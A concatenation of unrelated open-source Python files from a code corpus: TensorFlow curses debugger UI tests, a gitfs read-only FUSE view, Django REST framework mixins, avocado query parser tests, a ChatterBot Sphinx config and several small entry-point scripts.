80,
command_sequence=[
string_to_codes("babble -n 3\n"),
string_to_codes("/foo\n"), # Regex search and highlight.
string_to_codes("/\n"), # Continue scrolling down.
self._EXIT
])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["b"])
ui.run_ui()
# The regex search and continuation search in the 3rd command should not
# have produced any output.
self.assertEqual(1, len(ui.unwrapped_outputs))
self.assertEqual([0], ui.output_pad_rows)
def testRegexSearchContinuationWithoutSearch(self):
"""Test continuation scrolling when no regex search has been performed."""
ui = MockCursesUI(
40,
80,
command_sequence=[
string_to_codes("babble -n 3\n"),
string_to_codes("/\n"), # Continue scrolling without search first.
self._EXIT
])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["b"])
ui.run_ui()
self.assertEqual(1, len(ui.unwrapped_outputs))
self.assertEqual([0], ui.output_pad_rows)
def testRegexSearchWithInvalidRegex(self):
"""Test using invalid regex to search."""
ui = MockCursesUI(
40,
80,
command_sequence=[
string_to_codes("babble -n 3\n"),
string_to_codes("/[\n"), # Continue scrolling without search first.
self._EXIT
])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["b"])
ui.run_ui()
# Invalid regex should not have led to a new screen of output.
self.assertEqual(1, len(ui.unwrapped_outputs))
self.assertEqual([0], ui.output_pad_rows)
# Invalid regex should have led to a toast error message.
self.assertEqual(["ERROR: Invalid regular expression: \"[\""], ui.toasts)
def testRegexSearchFromCommandHistory(self):
"""Test regex search commands are recorded in command history."""
ui = MockCursesUI(
40,
80,
command_sequence=[
string_to_codes("babble -n 3\n"),
string_to_codes("/(b|r)\n"), # Regex search and highlight.
string_to_codes("babble -n 4\n"),
[curses.KEY_UP],
[curses.KEY_UP],
string_to_codes("\n"), # Hit Up twice and Enter.
self._EXIT
])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["b"])
ui.run_ui()
self.assertEqual(4, len(ui.wrapped_outputs))
self.assertEqual(["bar"] * 3, ui.wrapped_outputs[0].lines[:3])
self.assertEqual({}, ui.wrapped_outputs[0].font_attr_segs)
self.assertEqual(["bar"] * 3, ui.wrapped_outputs[1].lines[:3])
for i in range(3):
self.assertEqual([(0, 1, "black_on_white"), (2, 3, "black_on_white")],
ui.wrapped_outputs[1].font_attr_segs[i])
self.assertEqual(["bar"] * 4, ui.wrapped_outputs[2].lines[:4])
self.assertEqual({}, ui.wrapped_outputs[2].font_attr_segs)
# The regex search command loaded from history should have worked on the
# new screen output.
self.assertEqual(["bar"] * 4, ui.wrapped_outputs[3].lines[:4])
for i in range(4):
self.assertEqual([(0, 1, "black_on_white"), (2, 3, "black_on_white")],
ui.wrapped_outputs[3].font_attr_segs[i])
def testDisplayTensorWithIndices(self):
"""Test displaying tensor with indices."""
ui = MockCursesUI(
8, # Use a small screen height to cause scrolling.
80,
command_sequence=[
string_to_codes("print_ones --size 5\n"),
[curses.KEY_NPAGE],
[curses.KEY_NPAGE],
[curses.KEY_NPAGE],
[curses.KEY_END],
[curses.KEY_NPAGE], # This PageDown goes over the bottom limit.
[curses.KEY_PPAGE],
[curses.KEY_PPAGE],
[curses.KEY_PPAGE],
[curses.KEY_HOME],
[curses.KEY_PPAGE], # This PageDown goes over the top limit.
self._EXIT
])
ui.register_command_handler("print_ones", self._print_ones,
"print an all-one matrix of specified size")
ui.run_ui()
self.assertEqual(11, len(ui.unwrapped_outputs))
self.assertEqual(11, len(ui.output_array_pointer_indices))
self.assertEqual(11, len(ui.scroll_messages))
for i in range(11):
self.assertEqual([
"Tensor \"m\":", "", "array([[ 1., 1., 1., 1., 1.],",
" [ 1., 1., 1., 1., 1.],",
" [ 1., 1., 1., 1., 1.],",
" [ 1., 1., 1., 1., 1.],",
" [ 1., 1., 1., 1., 1.]])"
], ui.unwrapped_outputs[i].lines)
self.assertEqual({
0: None,
-1: [1, 0]
}, ui.output_array_pointer_indices[0])
self.assertIn(" Scroll (PgDn): 0.00% -[1,0] ", ui.scroll_messages[0])
# Scrolled down one line.
self.assertEqual({
0: None,
-1: [2, 0]
}, ui.output_array_pointer_indices[1])
self.assertIn(" Scroll (PgDn/PgUp): 16.67% -[2,0] ", ui.scroll_messages[1])
# Scrolled down one line.
self.assertEqual({
0: [0, 0],
-1: [3, 0]
}, ui.output_array_pointer_indices[2])
self.assertIn(" Scroll (PgDn/PgUp): 33.33% [0,0]-[3,0] ",
ui.scroll_messages[2])
# Scrolled down one line.
self.assertEqual({
0: [1, 0],
-1: [4, 0]
}, ui.output_array_pointer_indices[3])
self.assertIn(" Scroll (PgDn/PgUp): 50.00% [1,0]-[4,0] ",
ui.scroll_messages[3])
# Scroll to the bottom.
self.assertEqual({
0: [4, 0],
-1: None
}, ui.output_array_pointer_indices[4])
self.assertIn(" Scroll (PgUp): 100.00% [4,0]- ", ui.scroll_messages[4])
# Attempt to scroll beyond the bottom should lead to no change.
self.assertEqual({
0: [4, 0],
-1: None
}, ui.output_array_pointer_indices[5])
self.assertIn(" Scroll (PgUp): 100.00% [4,0]- ", ui.scroll_messages[5])
# Scrolled up one line.
self.assertEqual({
0: [3, 0],
-1: None
}, ui.output_array_pointer_indices[6])
self.assertIn(" Scroll (PgDn/PgUp): 83.33% [3,0]- ", ui.scroll_messages[6])
# Scrolled up one line.
self.assertEqual({
0: [2, 0],
-1: None
}, ui.output_array_pointer_indices[7])
self.assertIn(" Scroll (PgDn/PgUp): 66.67% [2,0]- ", ui.scroll_messages[7])
# Scrolled up one line.
self.assertEqual({
0: [1, 0],
-1: [4, 0]
}, ui.output_array_pointer_indices[8])
self.assertIn(" Scroll (PgDn/PgUp): 50.00% [1,0]-[4,0] ",
ui.scroll_messages[8])
# Scroll to the top.
self.assertEqual({
0: None,
-1: [1, 0]
}, ui.output_array_pointer_indices[9])
self.assertIn(" Scroll (PgDn): 0.00% -[1,0] ", ui.scroll_messages[9])
# Attempt to scroll pass the top limit should lead to no change.
self.assertEqual({
0: None,
-1: [1, 0]
}, ui.output_array_pointer_indices[10])
self.assertIn(" Scroll (PgDn): 0.00% -[1,0] ", ui.scroll_messages[10])
def testScrollTensorByValidIndices(self):
"""Test scrolling to specified (valid) indices in a tensor."""
ui = MockCursesUI(
8, # Use a small screen height to cause scrolling.
80,
command_sequence=[
string_to_codes("print_ones --size 5\n"),
string_to_codes("@[0, 0]\n"), # Scroll to element [0, 0].
string_to_codes("@1,0\n"), # Scroll to element [3, 0].
string_to_codes("@[0,2]\n"), # Scroll back to line 0.
self._EXIT
])
ui.register_command_handler("print_ones", self._print_ones,
"print an all-one matrix of specified size")
ui.run_ui()
self.assertEqual(4, len(ui.unwrapped_outputs))
self.assertEqual(4, len(ui.output_array_pointer_indices))
for i in range(4):
self.assertEqual([
"Tensor \"m\":", "", "array([[ 1., 1., 1., 1., 1.],",
" [ 1., 1., 1., 1., 1.],",
" [ 1., 1., 1., 1., 1.],",
" [ 1., 1., 1., 1., 1.],",
" [ 1., 1., 1., 1., 1.]])"
], ui.unwrapped_outputs[i].lines)
self.assertEqual({
0: None,
-1: [1, 0]
}, ui.output_array_pointer_indices[0])
self.assertEqual({
0: [0, 0],
-1: [3, 0]
}, ui.output_array_pointer_indices[1])
self.assertEqual({
0: [1, 0],
-1: [4, 0]
}, ui.output_array_pointer_indices[2])
self.assertEqual({
0: [0, 0],
-1: [3, 0]
}, ui.output_array_pointer_indices[3])
def testScrollTensorByInvalidIndices(self):
"""Test scrolling to specified invalid indices in a tensor."""
ui = MockCursesUI(
8, # Use a small screen height to cause scrolling.
80,
command_sequence=[
string_to_codes("print_ones --size 5\n"),
string_to_codes("@[10, 0]\n"), # Scroll to invalid indices.
string_to_codes("@[]\n"), # Scroll to invalid indices.
string_to_codes("@\n"), # Scroll to invalid indices.
self._EXIT
])
ui.register_command_handler("print_ones", self._print_ones,
"print an all-one matrix of specified size")
ui.run_ui()
# Because all scroll-by-indices commands are invalid, there should be only
# one output event.
self.assertEqual(1, len(ui.unwrapped_outputs))
self.assertEqual(1, len(ui.output_array_pointer_indices))
# Check error messages.
self.assertEqual("ERROR: Indices exceed tensor dimensions.", ui.toasts[1])
self.assertEqual("ERROR: invalid literal for int() with base 10: ''",
ui.toasts[2])
self.assertEqual("ERROR: Empty indices.", ui.toasts[3])
if __name__ == "__main__":
googletest.main()
| DCSaunders/tensorflow | tensorflow/python/debug/cli/curses_ui_test.py | Python | apache-2.0 | 39,416 |
# Copyright 2014 PressLabs SRL
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from errno import EROFS
from fuse import FuseOSError, ENOTSUP
from .view import View
class ReadOnlyView(View):
def getxattr(self, path, name, *args):
raise FuseOSError(ENOTSUP)
def open(self, path, flags):
write_flags = (os.O_WRONLY | os.O_RDWR | os.O_APPEND | os.O_TRUNC
| os.O_CREAT)
if write_flags & flags:
raise FuseOSError(EROFS)
return 0
def create(self, path, fh):
raise FuseOSError(EROFS)
def write(self, path, fh):
raise FuseOSError(EROFS)
def opendir(self, path):
return 0
def releasedir(self, path, fi):
return 0
def flush(self, path, fh):
return 0
def release(self, path, fh):
return 0
def access(self, path, amode):
if amode & os.W_OK:
raise FuseOSError(EROFS)
return 0
def mkdir(self, path, mode):
raise FuseOSError(EROFS)
def utimens(self, path, times=None):
raise FuseOSError(EROFS)
def chown(self, path, uid, gid):
raise FuseOSError(EROFS)
def chmod(self, path, mode):
raise FuseOSError(EROFS)
| ksmaheshkumar/gitfs | gitfs/views/read_only.py | Python | apache-2.0 | 1,744 |
from djangorestframework.mixins import ModelMixin, CreateModelMixin, \
UpdateModelMixin
from djangorestframework_extensions.utils import user_passes_test
__all__ = ['RoleBasedExclusion', 'RestrictedModelMixin',
'RestrictedCreateModelMixin', 'RestrictedUpdateModelMixin']
class RoleBasedExclusion(object):
def role_based_exclusion(self):
exclude = self.exclude
if not isinstance(exclude, dict):
return exclude or ()
user = getattr(self.request, 'user', None)
if user:
if user.is_superuser:
return exclude.get('superuser', ())
elif user.is_staff:
return exclude.get('staff', ())
for test, exclusion in exclude.get('roles', ()):
if user_passes_test(user, test):
return exclusion
return exclude[None]
def get_fields(self, obj):
fields = self.fields
# If `fields` is not set, we use the default fields and modify
# them with `include` and `exclude`
if not fields:
default = self.get_default_fields(obj)
include = self.include or ()
exclude = self.role_based_exclusion() or ()
fields = set(default + list(include)) - set(exclude)
return fields
class RestrictedModelMixin(RoleBasedExclusion, ModelMixin):
pass
class RestrictedCreateModelMixin(RestrictedModelMixin, CreateModelMixin):
def post(self, request, *args, **kwargs):
pass
class RestrictedUpdateModelMixin(RestrictedModelMixin, UpdateModelMixin):
def put(self, request, *args, **kwargs):
pass
| pombredanne/djangorestframework_extensions | djangorestframework_extensions/mixins.py | Python | bsd-2-clause | 1,649 |
from copy import deepcopy
from django.test import TestCase
from django.core.exceptions import ValidationError
from django.core import management
from avocado.query import oldparsers as parsers
from avocado.models import DataConcept, DataField, DataConceptField
from ....models import Employee
class DataContextParserTestCase(TestCase):
fixtures = ['employee_data.json']
def setUp(self):
management.call_command('avocado', 'init', 'tests', quiet=True)
def test_valid(self):
title = DataField.objects.get_by_natural_key('tests.title.name')
# Single by id (deprecated)
attrs = {
'id': title.pk,
'operator': 'exact',
'value': 'CEO',
'cleaned_value': {'value': 'CEO', 'label': 'CEO'},
'language': 'Name is CEO'
}
self.assertEqual(
parsers.datacontext.validate(deepcopy(attrs), tree=Employee),
attrs)
# Single by dotted label
attrs = {
'field': 'tests.title.name',
'operator': 'exact',
'value': 'CEO',
'cleaned_value': {'value': 'CEO', 'label': 'CEO'},
'language': 'Name is CEO'
}
self.assertEqual(
parsers.datacontext.validate(deepcopy(attrs), tree=Employee),
attrs)
# Single by label list
attrs = {
'field': ['tests', 'title', 'name'],
'operator': 'exact',
'value': 'CEO',
'cleaned_value': {'value': 'CEO', 'label': 'CEO'},
'language': 'Name is CEO'
}
self.assertEqual(
parsers.datacontext.validate(deepcopy(attrs), tree=Employee),
attrs)
# Single by field
attrs = {
'field': title.pk,
'operator': 'exact',
'value': 'CEO',
'cleaned_value': {'value': 'CEO', 'label': 'CEO'},
'language': 'Name is CEO'
}
self.assertEqual(
parsers.datacontext.validate(deepcopy(attrs), tree=Employee),
attrs)
# Branch node
attrs = {
'type': 'and',
'children': [{
'field': 'tests.title.name',
'operator': 'exact',
'value': 'CEO',
'cleaned_value': {'value': 'CEO', 'label': 'CEO'},
'language': 'Name is CEO'
}, {
'field': 'tests.employee.first_name',
'operator': 'exact',
'value': 'John',
'cleaned_value': {'value': 'John', 'label': 'John'},
'language': 'First Name is John'
}],
}
self.assertEqual(
parsers.datacontext.validate(deepcopy(attrs), tree=Employee),
attrs)
# No children
attrs = {
'type': 'and',
'children': [],
}
self.assertEqual(
parsers.datacontext.validate(deepcopy(attrs), tree=Employee),
attrs)
# 1 child
attrs = {
'type': 'and',
'children': [{
'field': 'tests.title.name',
'operator': 'exact',
'value': 'CEO',
'cleaned_value': {'value': 'CEO', 'label': 'CEO'},
'language': 'Name is CEO'
}]
}
self.assertEqual(
parsers.datacontext.validate(deepcopy(attrs), tree=Employee),
attrs)
def test_invalid(self):
# Non-existent data field
attrs = parsers.datacontext.validate({
'field': 999,
'operator': 'exact',
'value': 'CEO'
})
self.assertFalse(attrs['enabled'])
# Object must be a dict
self.assertRaises(ValidationError, parsers.datacontext.validate, 1)
# Invalid logical operator
attrs = parsers.datacontext.validate({'type': 'foo', 'children': []})
self.assertFalse(attrs['enabled'])
# Missing 'value' key in first condition
attrs = parsers.datacontext.validate({
'type': 'and',
'children': [{
'field': 'tests.title.name',
'operator': 'exact'
}, {
'field': 'tests.title.name',
'operator': 'exact',
'value': 'CEO'
}]
}, tree=Employee)
self.assertTrue(attrs.get('enabled', True))
self.assertFalse(attrs['children'][0]['enabled'])
self.assertTrue(attrs['children'][1].get('enabled', True))
def test_field_for_concept(self):
f = DataField.objects.get(model_name='title', field_name='name')
c1 = DataConcept()
c2 = DataConcept()
c1.save()
c2.save()
cf = DataConceptField(concept=c1, field=f)
cf.save()
attrs = {
'concept': c1.pk,
'field': f.pk,
'operator': 'exact',
'value': 'CEO',
'cleaned_value': {'value': 'CEO', 'label': 'CEO'},
'language': 'Name is CEO'
}
self.assertEqual(
parsers.datacontext.validate(deepcopy(attrs), tree=Employee),
attrs)
# Invalid concept
attrs = parsers.datacontext.validate({
'concept': c2.pk,
'field': f.pk,
'operator': 'exact',
'value': 'CEO',
}, tree=Employee)
self.assertFalse(attrs['enabled'])
def test_parsed_node(self):
node = parsers.datacontext.parse({
'type': 'and',
'children': [],
}, tree=Employee)
# No condition has been defined..
self.assertEqual(node.condition, None)
node = parsers.datacontext.parse({
'type': 'and',
'children': [{
'field': 'tests.title.name',
'operator': 'exact',
'value': 'CEO',
}]
}, tree=Employee)
# Only the one condition is represented
self.assertEqual(str(node.condition),
"(AND: ('title__name__exact', u'CEO'))")
def test_apply(self):
f = DataField.objects.get_by_natural_key('tests',
'title',
'boss')
f1 = DataField.objects.get_by_natural_key('tests',
'employee',
'first_name')
node = parsers.datacontext.parse({
'field': 'tests.title.boss',
'operator': 'exact',
'value': True
}, tree=Employee)
self.assertEqual(
unicode(node.apply().values('id').query).replace(' ', ''),
'SELECT DISTINCT "tests_employee"."id" FROM "tests_employee" '
'INNER JOIN "tests_title" ON ("tests_employee"."title_id" = '
'"tests_title"."id") WHERE "tests_title"."boss" = True '
.replace(' ', ''))
self.assertEqual(node.language, {
'operator': 'exact',
'language': u'Boss is True',
'field': f.pk,
'value': True
})
# Branch node
node = parsers.datacontext.parse({
'type': 'and',
'children': [{
'field': 'tests.title.boss',
'operator': 'exact',
'value': True,
}, {
'field': 'tests.employee.first_name',
'operator': 'exact',
'value': 'John',
}]
}, tree=Employee)
self.assertEqual(
unicode(node.apply().values('id').query).replace(' ', ''),
'SELECT DISTINCT "tests_employee"."id" FROM "tests_employee" '
'INNER JOIN "tests_title" ON ("tests_employee"."title_id" = '
'"tests_title"."id") WHERE ("tests_employee"."first_name" = John '
'AND "tests_title"."boss" = True )'.replace(' ', ''))
self.assertEqual(node.language, {
'type': 'and',
'children': [{
'field': f.pk,
'operator': 'exact',
'value': True,
'language': 'Boss is True',
}, {
'field': f1.pk,
'operator': 'exact',
'value': 'John',
'language': 'First Name is John',
}]
})
class DataViewParserTestCase(TestCase):
fixtures = ['tests/fixtures/employee_data.json']
def setUp(self):
management.call_command('avocado', 'init', 'tests', publish=False,
concepts=False, quiet=True)
f1 = DataField.objects.get_by_natural_key('tests',
'employee',
'first_name')
f2 = DataField.objects.get_by_natural_key('tests',
'employee',
'last_name')
self.c = DataConcept()
self.c.save()
DataConceptField(concept=self.c, field=f1).save()
DataConceptField(concept=self.c, field=f2).save()
def test_valid(self):
# Single by id
self.assertEqual(parsers.dataview.validate([{
'concept': self.c.pk
}], tree=Employee), [{
'concept': self.c.pk,
}])
self.assertEqual(parsers.dataview.validate([{
'concept': self.c.pk,
'sort': 'desc',
}], tree=Employee), [{
'concept': self.c.pk,
'sort': 'desc',
}])
def test_valid_legacy(self):
# Single by id
self.assertEqual(parsers.dataview.validate({
'columns': [self.c.pk],
}, tree=Employee), [{
'concept': self.c.pk,
'visible': True,
'sort': None,
'sort_index': None,
}])
self.assertEqual(parsers.dataview.validate({
'ordering': [(self.c.pk, 'desc')],
}, tree=Employee), [{
'concept': self.c.pk,
'visible': False,
'sort': 'desc',
'sort_index': 0,
}])
def test_invalid(self):
# Non-existent data field
facets = parsers.dataview.validate({'columns': [999]})
self.assertFalse(facets[0]['enabled'])
self.assertTrue(facets[0]['errors'])
# Invalid ordering
facets = parsers.dataview.validate([{
'concept': self.c.pk,
'sort': 'foo',
}])
self.assertTrue(facets[0]['warnings'])
def test_apply(self):
node = parsers.dataview.parse([{
'concept': self.c.pk,
}], tree=Employee)
self.assertEqual(
unicode(node.apply().query).replace(' ', ''),
'SELECT "tests_employee"."id", "tests_employee"."first_name", '
'"tests_employee"."last_name" FROM "tests_employee"'
.replace(' ', ''))
node = parsers.dataview.parse([{
'concept': self.c.pk,
'sort': 'desc',
'visible': False,
}], tree=Employee)
self.assertEqual(
unicode(node.apply().query).replace(' ', ''),
'SELECT "tests_employee"."id" FROM "tests_employee" '
'ORDER BY "tests_employee"."first_name" DESC, '
'"tests_employee"."last_name" DESC'
.replace(' ', ''))
def test_apply_distinct(self):
node = parsers.dataview.parse([{
'concept': self.c.pk,
}], tree=Employee)
self.assertEqual(
unicode(node.apply(Employee.objects.distinct()).query)
.replace(' ', ''),
'SELECT DISTINCT "tests_employee"."id", '
'"tests_employee"."first_name", '
'"tests_employee"."last_name" FROM "tests_employee"'
.replace(' ', ''))
def test_implicit_apply_distinct(self):
f1 = DataField.objects.get_by_natural_key('tests',
'office',
'location')
f2 = DataField.objects.get_by_natural_key('tests',
'title',
'name')
c = DataConcept()
c.save()
DataConceptField(concept=c, field=f1).save()
DataConceptField(concept=c, field=f2).save()
# Due to the use of distinct, the concept fields appear in the SELECT
# statement at this point. This is not a bug, but a requirement of SQL.
# These columns are stripped downstream by the exporter.
node = parsers.dataview.parse([{
'concept': c.pk,
'sort': 'desc',
'visible': False,
}], tree=Employee)
self.assertEqual(
unicode(node.apply(Employee.objects.distinct()).query)
.replace(' ', ''),
'SELECT DISTINCT "tests_employee"."id", '
'"tests_office"."location", "tests_title"."name" FROM '
'"tests_employee" INNER JOIN "tests_office" ON '
'("tests_employee"."office_id" = "tests_office"."id") LEFT OUTER '
'JOIN "tests_title" ON ("tests_employee"."title_id" = '
'"tests_title"."id") ORDER BY "tests_office"."location" DESC, '
'"tests_title"."name" DESC'
.replace(' ', ''))
class DataQueryParserTestCase(TestCase):
fixtures = ['employee_data.json']
def setUp(self):
management.call_command('avocado', 'init', 'tests', publish=False,
concepts=False, quiet=True)
f1 = DataField.objects.get_by_natural_key('tests',
'employee',
'first_name')
f2 = DataField.objects.get_by_natural_key('tests',
'employee',
'last_name')
self.c = DataConcept()
self.c.save()
DataConceptField(concept=self.c, field=f1).save()
DataConceptField(concept=self.c, field=f2).save()
def test_valid(self):
self.assertEqual(parsers.dataquery.validate({}, tree=Employee), None)
attrs = {
'context': {
'field': 'tests.title.name',
'operator': 'exact',
'value': 'CEO',
'cleaned_value': {'value': 'CEO', 'label': 'CEO'},
'language': 'Name is CEO'
},
'view': [{
'concept': self.c.pk,
}],
}
exp_attrs = deepcopy(attrs)
self.assertEqual(parsers.dataquery.validate(attrs, tree=Employee),
exp_attrs)
# Only the context
attrs = {
'context': {
'field': 'tests.title.name',
'operator': 'exact',
'value': 'CEO',
'cleaned_value': {
'value': 'CEO',
'label': 'CEO',
},
'language': 'Name is CEO'
}
}
exp_attrs = deepcopy(attrs)
exp_attrs['view'] = None
self.assertEqual(parsers.dataquery.validate(attrs, tree=Employee),
exp_attrs)
# Only the view
attrs = {
'view': [{
'concept': self.c.pk,
'visible': False,
'sort': 'desc',
}]
}
exp_attrs = {
'context': None,
'view': [{
'visible': False,
'concept': self.c.pk,
'sort': 'desc',
}],
}
self.assertEqual(parsers.dataquery.validate(attrs, tree=Employee),
exp_attrs)
def test_parsed_node(self):
# Make sure no context or view subnodes are created
node = parsers.dataquery.parse({}, tree=Employee)
self.assertEqual(node.datacontext_node, None)
self.assertEqual(node.dataview_node, None)
node = parsers.dataquery.parse({
'context': {
'type': 'and',
'children': [],
}
}, tree=Employee)
# No condition has been defined..
self.assertEqual(node.datacontext_node.condition, None)
node = parsers.dataquery.parse({
'context': {
'type': 'and',
'children': [{
'field': 'tests.title.name',
'operator': 'exact',
'value': 'CEO',
}]
}
}, tree=Employee)
# Only the one condition is represented
self.assertEqual(str(node.datacontext_node.condition),
"(AND: ('title__name__exact', u'CEO'))")
def test_apply(self):
node = parsers.dataquery.parse({
'context': {
'field': 'tests.title.boss',
'operator': 'exact',
'value': True
},
'view': [{
'concept': self.c.pk,
}],
}, tree=Employee)
self.assertEqual(
unicode(node.apply().query).replace(' ', ''),
'SELECT DISTINCT "tests_employee"."id", '
'"tests_employee"."first_name", "tests_employee"."last_name" FROM '
'"tests_employee" INNER JOIN "tests_title" ON '
'("tests_employee"."title_id" = "tests_title"."id") '
'WHERE "tests_title"."boss" = True '
.replace(' ', ''))
# Just the view
node = parsers.dataquery.parse({
'view': [{
'concept': self.c.pk,
'sort': 'desc',
}]
}, tree=Employee)
self.assertEqual(
unicode(node.apply().query).replace(' ', ''),
'SELECT DISTINCT "tests_employee"."id", '
'"tests_employee"."first_name", '
'"tests_employee"."last_name" FROM "tests_employee" '
'ORDER BY "tests_employee"."first_name" DESC, '
'"tests_employee"."last_name" DESC'.replace(' ', ''))
# Just the context
node = parsers.dataquery.parse({
'context': {
'field': 'tests.title.boss',
'operator': 'exact',
'value': True
}
}, tree=Employee)
self.assertEqual(
unicode(node.apply().values('id').query).replace(' ', ''),
'SELECT DISTINCT "tests_employee"."id" FROM "tests_employee" '
'INNER JOIN "tests_title" ON ("tests_employee"."title_id" = '
'"tests_title"."id") WHERE "tests_title"."boss" = True '
.replace(' ', ''))
f = DataField.objects.get_by_natural_key('tests', 'title', 'boss')
self.assertEqual(node.datacontext_node.language, {
'operator': 'exact',
'language': u'Boss is True',
'field': f.pk,
'value': True
})
| murphyke/avocado | tests/cases/query/tests/parsers.py | Python | bsd-2-clause | 19,203 |
#### PATTERN | NL | PARSER COMMAND-LINE ##################################
# Copyright (c) 2010 University of Antwerp, Belgium
# Author: Tom De Smedt <tom@organisms.be>
# License: BSD (see LICENSE.txt for details).
# http://www.clips.ua.ac.be/pages/pattern
##########################################################################
# In Python 2.7+ modules invoked from the command line will look for a
# __main__.py.
from __future__ import absolute_import
from .__init__ import commandline, parse
commandline(parse)
| hayd/pattern | pattern/text/nl/__main__.py | Python | bsd-3-clause | 521 |
# -*- coding: utf-8 -*-
#
# ChatterBot documentation build configuration file, created by
# sphinx-quickstart on Mon May 9 14:38:54 2016.
import sys
import os
import sphinx_rtd_theme
from datetime import datetime
# Insert the project root dir as the first element in the PYTHONPATH.
# This lets us ensure that the source package is imported, and that its version is used.
current_directory = os.path.dirname(os.path.abspath(__file__))
parent_directory = os.path.abspath(os.path.join(current_directory, os.pardir))
sys.path.insert(0, parent_directory)
import chatterbot
# -- General configuration ------------------------------------------------
# Add any Sphinx extension module names here, as strings.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.autosectionlabel',
'sphinx.ext.coverage',
'sphinx.ext.doctest',
'sphinx.ext.intersphinx',
'sphinx.ext.mathjax',
'sphinx.ext.todo',
'sphinx.ext.viewcode'
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
source_suffix = ['.rst', '.md']
# The encoding of source files
#source_encoding = 'utf-8-sig'
# The master toctree document
master_doc = 'index'
# General information about the project
project = 'ChatterBot'
copyright = '{}, {}'.format(datetime.now().year, chatterbot.__author__)
author = chatterbot.__author__
# The short X.Y version
version = chatterbot.__version__
# The full version, including alpha/beta/rc tags
release = chatterbot.__version__
language = 'en'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = []
# If true, '()' will be appended to :func: etc. cross-reference text
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::)
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use
pygments_style = 'sphinx'
# -- Options for HTML output ----------------------------------------------
html_theme = 'sphinx_rtd_theme'
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
html_theme_options = {
'logo_only': True
}
html_show_sourcelink = False
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
html_logo = '../graphics/banner.png'
# The name of an image file (relative to this directory) to use as a favicon of
# the docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
html_favicon = '_static/favicon.ico'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not None, a 'Last updated on:' timestamp is inserted at every page
# bottom, using the given strftime format.
# The empty string is equivalent to '%b %d, %Y'.
#html_last_updated_fmt = None
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
html_show_sphinx = False
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr', 'zh'
html_search_language = 'en'
# Output file base name for HTML help builder
htmlhelp_basename = 'ChatterBotdoc'
# Read the docs theme modifications
html_context = {
'extra_css_files': [
'_static/style.css'
]
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class])
latex_documents = [
(master_doc, 'ChatterBot.tex', u'ChatterBot Documentation',
u'Gunther Cox', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section)
man_pages = [
(master_doc, 'chatterbot', u'ChatterBot Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'ChatterBot', u'ChatterBot Documentation',
author, 'ChatterBot', 'One line description of project.',
'Miscellaneous'),
]
# -- Options for Epub output ----------------------------------------------
# Bibliographic Dublin Core info
epub_title = project
epub_author = author
epub_publisher = author
epub_copyright = copyright
# A list of files that should not be packed into the epub file
epub_exclude_files = ['search.html']
# Example configuration for intersphinx: refer to the Python standard library
intersphinx_mapping = {'https://docs.python.org/': None}
| Gustavo6046/ChatterBot | docs/conf.py | Python | bsd-3-clause | 6,225 |
{
"success": "Embed 5f585b01c81b12ecdf5f40df0382738d0919170639985d3df5e2fc4232865b0c successfully revoked."
}
| jhotta/documentation | code_snippets/results/result.api-embeds-revoke.py | Python | bsd-3-clause | 114 |
#!/usr/bin/env python
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import sys
sys.path.append(os.path.join(os.path.dirname(__file__),
os.pardir, os.pardir, os.pardir, 'tools', 'telemetry'))
from telemetry import test_runner
if __name__ == '__main__':
sys.exit(test_runner.Main())
| patrickm/chromium.src | content/test/gpu/run_gpu_test.py | Python | bsd-3-clause | 416 |
# GUI Application automation and testing library
# Copyright (C) 2006-2018 Mark Mc Mahon and Contributors
# https://github.com/pywinauto/pywinauto/graphs/contributors
# http://pywinauto.readthedocs.io/en/latest/credits.html
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
